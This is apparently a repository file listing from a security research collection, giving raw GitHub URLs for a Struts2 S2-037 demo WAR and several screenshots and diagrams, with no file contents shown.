--------------------------------------------------------------------------------
/Struts2/demo/s2-037.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Struts2/demo/s2-037.war


--------------------------------------------------------------------------------
/images/CDGServer3_old.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/CDGServer3_old.png


--------------------------------------------------------------------------------
/images/Pasted image 20230307105828.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/Pasted image 20230307105828.png


--------------------------------------------------------------------------------
/images/Pasted image 20230310210247.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/Pasted image 20230310210247.png


--------------------------------------------------------------------------------
/images/Pasted image 20230310211445.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/Pasted image 20230310211445.png


--------------------------------------------------------------------------------
/images/filter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/filter.png


--------------------------------------------------------------------------------
/images/image-20230829101922114.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/image-20230829101922114.png


--------------------------------------------------------------------------------
/images/image-20240112170234236.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/image-20240112170234236.png


--------------------------------------------------------------------------------
/images/security_diagram.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/security_diagram.jpg


--------------------------------------------------------------------------------
/images/致远服务配置Agent.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/images/致远服务配置Agent.png


--------------------------------------------------------------------------------